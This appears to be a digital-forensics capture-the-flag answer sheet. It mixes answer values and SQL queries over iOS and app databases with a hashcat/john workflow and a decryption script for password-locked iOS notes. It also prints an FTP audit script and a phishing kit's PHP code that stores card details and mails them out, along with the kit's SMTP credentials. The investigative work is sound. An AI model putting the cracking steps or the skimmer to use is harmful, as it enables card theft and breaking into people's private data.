352978115584444

ABD

A

AE0D6735BBE45B0B8F1AB7838623D9C8

B

D

D

D

A

SELECT * 
FROM BookmarkNHistory
WHERE CREATED_DATE >= 1665497040
ORDER BY CREATED_DATE;

DE

90

B

B

A

4567567812344567

B

D

C

SELECT *
FROM kmb_routestopfile_ST
WHERE lat BETWEEN 22.416027 - 0.0005 AND 22.416027 + 0.0005
  AND lng BETWEEN 114.213945 - 0.0005 AND 114.213945 + 0.0005
ORDER BY ABS(lat - 22.416027) + ABS(lng - 114.213945)
LIMIT 10;

CE1453

20220922_152622.jpg

A

G-785186

85259308538

D

IMG_0444.JPG

D0CF11E0

┌──(kali㉿kali)-[~]
└─$ file 111.pdf
111.pdf: Composite Document File V2 Document, Little Endian, Os: MacOS, Version 6.12, Code page: 10000, Author: user30, Last Saved By: user30, Name of Creating Application: Microsoft Macintosh Excel, Create Time/Date: Wed Sep 28 12:06:13 2022, Last Saved Time/Date: Fri Sep 30 10:37:41 2022, Security: 0

WONG SAI PING

C

124500

SELECT 'ZIMPORTEDFROMSOURCEIDENTIFIER' AS column_name, name AS table_name
FROM sqlite_master
WHERE type='table' AND sql LIKE '%ZIMPORTEDFROMSOURCEIDENTIFIER%'
UNION ALL
SELECT 'ZIMPORTEDBYBUNDLEIDENTIFIER', name
FROM sqlite_master
WHERE type='table' AND sql LIKE '%ZIMPORTEDBYBUNDLEIDENTIFIER%'
UNION ALL
SELECT 'ZRECEIVEMETHODIDENTIFIER', name
FROM sqlite_master
WHERE type='table' AND sql LIKE '%ZRECEIVEMETHODIDENTIFIER%'
UNION ALL
SELECT 'ZRECEIVEDFROMIDENTIFIER', name
FROM sqlite_master
WHERE type='table' AND sql LIKE '%ZRECEIVEDFROMIDENTIFIER%';

B

SELECT ZORIGINALFILENAME, ZIMPORTEDBYBUNDLEIDENTIFIER
FROM ZADDITIONALASSETATTRIBUTES
WHERE ZORIGINALFILENAME IN (
    'IMG_0420.HEIC',
    'IMG_0421.HEIC',
    'IMG_0422.HEIC',
    'IMG_0446.HEIC'
);

SELECT ZORIGINALFILENAME, ZIMPORTEDBYBUNDLEIDENTIFIER
FROM ZADDITIONALASSETATTRIBUTES
WHERE ZORIGINALFILENAME IN (
    'IMG_0381.HEIC',
    'IMG_0383.HEIC',
    'IMG_0730.HEIC'
);

C

IMG0730HEIC

SELECT 
    ZTITLE1,
    ZCRYPTOITERATIONCOUNT,
    ZISPASSWORDPROTECTED
FROM ZICCLOUDSYNCINGOBJECT
WHERE ZTITLE1 IN ('Halo', '今天');

#!/usr/bin/env perl
use strict;
use warnings;
use DBI;
use DBD::SQLite;

die "usage: $0 NoteStore.sqlite\n" unless (scalar @ARGV == 1);

my $database = shift @ARGV;
my $dsn      = "DBI:SQLite:dbname=$database";
my $userid   = "";
my $password = "";

my $dbh = DBI->connect ($dsn, $userid, $password, { RaiseError => 1 }) or die $DBI::errstr;

my $sth = $dbh->prepare ("SELECT Z_PK,ZCRYPTOITERATIONCOUNT,ZCRYPTOSALT,ZCRYPTOWRAPPEDKEY FROM ZICCLOUDSYNCINGOBJECT WHERE ZISPASSWORDPROTECTED=1");

$sth->execute () or die $DBI::errstr;

while (my $row = $sth->fetchrow_arrayref ())
{
  printf ("\$ASN\$*%d*%d*%s*%s\n", $row->[0], $row->[1], unpack ("H*", $row->[2]), unpack ("H*", $row->[3]));
}

$sth->finish;

$dbh->disconnect ();

exit (0);

perl iOS_notes.pl NoteStore.sqlite > hash.txt

head  -n 1 hash.txt > hash_first.txt

hashcat -m 16200 -a 0 hash_first.txt /usr/share/wordlists/rockyou.txt

john --wordlist=/usr/share/wordlists/rockyou.txt hash_first.txt

john --show hash_first.txt

234567

#!/usr/bin/env python3
import sqlite3
import sys
import zlib
from Crypto.Cipher import AES
from Crypto.Protocol.KDF import PBKDF2
from Crypto.Hash import SHA256

from cryptography.hazmat.primitives.keywrap import aes_key_unwrap
from cryptography.hazmat.backends import default_backend

def decrypt_aes_gcm(key, nonce, ciphertext, tag):
    """AES-GCM 解密"""
    try:
        cipher = AES.new(key, AES.MODE_GCM, nonce=nonce)
        # 关联数据为空，不传 assoc_data
        return cipher.decrypt_and_verify(ciphertext, tag)
    except ValueError as e:
        print(f"[-] AES-GCM Decryption failed: {e}")
        return None

def main():
    if len(sys.argv) != 3:
        print(f"Usage: {sys.argv[0]} NoteStore.sqlite password")
        sys.exit(1)

    db_file = sys.argv[1]
    password = sys.argv[2].encode()

    conn = sqlite3.connect(db_file)
    cursor = conn.cursor()

    try:
        cursor.execute("""
            SELECT
                t1.Z_PK,
                t1.ZCRYPTOITERATIONCOUNT,
                t1.ZCRYPTOSALT,
                t1.ZCRYPTOWRAPPEDKEY,
                t1.ZENCRYPTEDVALUESJSON,
                t2.ZCRYPTOINITIALIZATIONVECTOR,
                t2.ZCRYPTOTAG,
                t2.ZDATA
            FROM
                ZICCLOUDSYNCINGOBJECT AS t1
            JOIN
                ZICNOTEDATA AS t2 ON t1.Z_PK = t2.ZNOTE
            WHERE
                t1.ZISPASSWORDPROTECTED = 1
        """)
    except sqlite3.OperationalError as e:
        print(f"[!] Database query failed. The schema might be different. Error: {e}")
        conn.close()
        sys.exit(1)

    rows = cursor.fetchall()
    if not rows:
        print("[!] No password protected notes found in the database.")
        conn.close()
        return

    decryption_successful = False
    for row in rows:
        pk, iterations, salt, wrapped_key_blob, encrypted_json, iv_blob, tag_blob, data_blob = row
        
        print(f"\n--- Processing Note Z_PK={pk} ---")
        
        if not (salt and wrapped_key_blob):
            print("[*] Skipping note due to missing salt or wrapped key.")
            continue

        salt = bytes(salt)
        wrapped_key_blob = bytes(wrapped_key_blob)

        try:
            # 步骤 1: 派生主密钥 (KEK)
            print("[+] Step 1: Deriving Key Encrypting Key using PBKDF2-SHA256...")
            main_key = PBKDF2(password, salt, dkLen=16, count=iterations, hmac_hash_module=SHA256)

            # 步骤 2: 使用 cryptography AES Key Unwrap 解包笔记密钥
            print("[+] Step 2: Unwrapping note encryption key using AES Key Unwrap...")
            aes_key = aes_key_unwrap(main_key, wrapped_key_blob, backend=default_backend())
            print("[+] Successfully unwrapped note key!")

        except (ValueError, TypeError) as e:
            print(f"[!] Step 2 FAILED. This almost certainly means the password '{sys.argv[2]}' is incorrect. Error: {e}")
            continue

        # 步骤 3: 选择要解密的笔记数据
        data_to_decrypt = None
        source_column = ""
        if encrypted_json:
            data_to_decrypt = encrypted_json
            source_column = "ZENCRYPTEDVALUESJSON"
        elif data_blob:
            data_to_decrypt = data_blob
            source_column = "ZDATA from ZICNOTEDATA"
        else:
            print(f"[*] Note Z_PK={pk} key was unwrapped, but no content data found to decrypt.")
            decryption_successful = True
            continue
        
        print(f"[+] Step 3: Found encrypted content in column '{source_column}'.")
        data_to_decrypt = bytes(data_to_decrypt)
        
        # 步骤 4: AES-GCM 解密笔记内容
        if not (iv_blob and tag_blob):
             print(f"[*] Skipping content decryption for Z_PK={pk}, missing IV or Tag in ZICNOTEDATA.")
             continue
        
        nonce_d = bytes(iv_blob)
        tag_d = bytes(tag_blob)
        ciphertext_d = data_to_decrypt

        print(f"[+] Step 4: Decrypting note content using AES-GCM...")
        plaintext_gzipped = decrypt_aes_gcm(aes_key, nonce_d, ciphertext_d, tag_d)
        
        if plaintext_gzipped:
            # 步骤 5: Gzip 解压
            print(f"[+] Step 5: Decompressing Gzip data...")
            try:
                decompressed_data = zlib.decompress(plaintext_gzipped, 16 + zlib.MAX_WBITS)
                print(f"======== DECRYPTED NOTE (Z_PK={pk}) ========")
                # 只显示可解码文本，忽略不可打印字符
                print(decompressed_data.decode('utf-8', errors='ignore'))
                print(f"{'='*60}\n")
                decryption_successful = True
            except zlib.error as e:
                print(f"[!] Gzip decompression failed for Z_PK={pk}. Error: {e}")
                print(f"Raw decrypted data (gzipped):\n{plaintext_gzipped}")

    conn.close()

    if not decryption_successful and rows:
        print("\n[!] Decryption failed for all notes. Please double-check the password.")

if __name__ == '__main__':
    main()

python decrypt_notes.py NoteStore.sqlite "234567"

--- Processing Note Z_PK=31 ---
[+] Step 1: Deriving Key Encrypting Key using PBKDF2-SHA256...
[+] Step 2: Unwrapping note encryption key using AES Key Unwrap...
[+] Successfully unwrapped note key!
[+] Step 3: Found encrypted content in column 'ZDATA from ZICNOTEDATA'.
[+] Step 4: Decrypting note content using AES-GCM...
[+] Step 5: Decompressing Gzip data...
======== DECRYPTED NOTE (Z_PK=31) ========
▒
 Halo

123456▒
(▒
(▒
 (▒
 
(▒
"
▒
c=!FCe8▒h▒hȕ*
hȕ*
  ▒hȕ*
     ▒hȕ*
        ▒hɕ*
           ▒hɕ
============================================================


--- Processing Note Z_PK=33 ---
[+] Step 1: Deriving Key Encrypting Key using PBKDF2-SHA256...
[+] Step 2: Unwrapping note encryption key using AES Key Unwrap...
[+] Successfully unwrapped note key!
[+] Step 3: Found encrypted content in column 'ZDATA from ZICNOTEDATA'.
[+] Step 4: Decrypting note content using AES-GCM...
[+] Step 5: Decompressing Gzip data...
======== DECRYPTED NOTE (Z_PK=33) ========
今天

▒
(▒
(▒
"
▒
c=!FC*8
    h☚*
     h☚*
h☚
============================================================

123456

Halo

A

ExpressVPN

20220915

Bitcoin

TELLAW_IEH

ACDE

C

BCDE

A

DBSQLITE

4

85270711901

N91088774024

B

D

D

ps aux | grep ftp

#!/bin/bash

CONFIG="/etc/vsftpd.conf"
FTPUSERS="/etc/vsftpd.ftpusers"
USER_LIST_FILE="/etc/vsftpd.user_list"

if ! systemctl is-active --quiet vsftpd; then
    echo "vsftpd 未运行"
    exit 1
fi

[ ! -f "$CONFIG" ] && { echo "配置文件不存在"; exit 1; }

LOCAL_ENABLE=$(grep -v '^#' "$CONFIG" | grep -E 'local_enable=.*YES' >/dev/null && echo YES || echo NO)
ANONYMOUS_ENABLE=$(grep -v '^#' "$CONFIG" | grep -E 'anonymous_enable=.*YES' >/dev/null && echo YES || echo NO)
USERLIST_ENABLE=$(grep -v '^#' "$CONFIG" | grep -E 'userlist_enable=.*NO' >/dev/null && echo NO || echo YES)
USERLIST_DENY=$(grep -v '^#' "$CONFIG" | grep -E 'userlist_deny=.*NO' >/dev/null && echo NO || echo YES)

BLACKLIST=()
[ -f "$FTPUSERS" ] && while IFS= read -r line; do
    [[ -z "$line" || "$line" =~ ^# ]] || BLACKLIST+=("$line")
done < "$FTPUSERS"

USER_LIST=()
[ -f "$USER_LIST_FILE" ] && while IFS= read -r line; do
    [[ -z "$line" || "$line" =~ ^# ]] || USER_LIST+=("$line")
done < "$USER_LIST_FILE"

USERS=()
while IFS=: read -r username _ uid _ _ _ shell; do
    if [ "$uid" -ge 1000 ] && [[ "$shell" != /usr/sbin/nologin && "$shell" != /bin/false ]]; then
        USERS+=("$username")
    fi
done < /etc/passwd

ALLOWED_USERS=()
if [ "$LOCAL_ENABLE" = "YES" ]; then
    for u in "${USERS[@]}"; do
        [[ " ${BLACKLIST[*]} " == *" $u "* ]] && continue
        if [ "$USERLIST_ENABLE" = "YES" ]; then
            if [ "$USERLIST_DENY" = "YES" ]; then
                [[ " ${USER_LIST[*]} " == *" $u "* ]] && continue
            else
                [[ " ${USER_LIST[*]} " != *" $u "* ]] && continue
            fi
        fi
        ALLOWED_USERS+=("$u")
    done
fi

echo "实际可登录 FTP 用户:"
if [ ${#ALLOWED_USERS[@]} -eq 0 ]; then
    echo "无用户可登录"
else
    printf "%s\n" "${ALLOWED_USERS[@]}"
fi

[ "$ANONYMOUS_ENABLE" = "YES" ] && echo "匿名用户可登录"

chmod +x test.sh

./test.sh

D

AD

ls -R -1 /var/www

B

<form align="center" action="process.php" method="post" name="Customerinfo">

$resultFile = "vu.txt";

$fOpen = fopen($resultFile, "a");
fwrite($fOpen, "Date & Time: ".$dateTime."\n");
fwrite($fOpen, "Card Holder: ".$holdername."\n");
fwrite($fOpen, "Card no.: ".$cardno."\n");
fwrite($fOpen, "cvv: ".$cvv."\n");
fwrite($fOpen, "expire date: ".$exp_mth."/".$exp_yr."\n");
fwrite($fOpen, "Email: ".$email."@".$email_domn."\n");
fwrite($fOpen, "Browser Info: ".$browser."\n");
fwrite($fOpen, "\n"); //End of Entry
fclose($fOpen);

VUTXT

// 从 POST 获取受害人提交的数据
$holdername = $_POST["holdername"];
$cardno = $_POST["cardno"];
$cvv = $_POST["cvv"];
$exp_mth = $_POST["exp_mth"];
$exp_yr = $_POST["exp_yr"];
$email = $_POST["email"];
$email_domn = $_POST["email_domn"];

// 设置档案名称
$resultFile = "vu.txt";

// 打开档案并写入数据
$fOpen = fopen($resultFile, "a");
fwrite($fOpen, "Date & Time: ".$dateTime."\n");
fwrite($fOpen, "Card Holder: ".$holdername."\n");
fwrite($fOpen, "Card no.: ".$cardno."\n");
fwrite($fOpen, "cvv: ".$cvv."\n");
fwrite($fOpen, "expire date: ".$exp_mth."/".$exp_yr."\n");
fwrite($fOpen, "Email: ".$email."@".$email_domn."\n");
fwrite($fOpen, "Browser Info: ".$browser."\n");
fwrite($fOpen, "\n"); //End of Entry
fclose($fOpen);
...
use PHPMailer\PHPMailer\SMTP;

require_once __DIR__ . '/vendor/phpmailer/src/Exception.php';
$mail = new PHPMailer(true);

$mail->isSMTP();
$mail->Host = 'smtp.gmai1.com';
$mail->SMTPAuth = true;
$mail->SMTPSecure = PHPMailer::ENCRYPTION_STARTTLS;
$mail->Port = 587;
$mail->Username = 'chunhe11amm@gmail.com';
$mail->Password = 'rtatsceucpacocbdacs';
$mail->setFrom('chunhe11amm@gmail.com', 'Smith');
$mail->addAddress('chunhe11amm@gmail.com', 'Tyler');
$mail->IsHTML(true);
$mail->Subject = "vu";
$mail->Body = $message;
$mail->AltBody = ' ';
$mail->send();

BC

$mail->Password = 'rtatsceucpacocbdacs';

RTATSCEUCPACOCBDACS

ACD

5d58c024174d

43306

2wsx3edc

CUSTOMER

SELECT DOB
FROM customer
WHERE Tel = '852-56412770'

19850214

CDE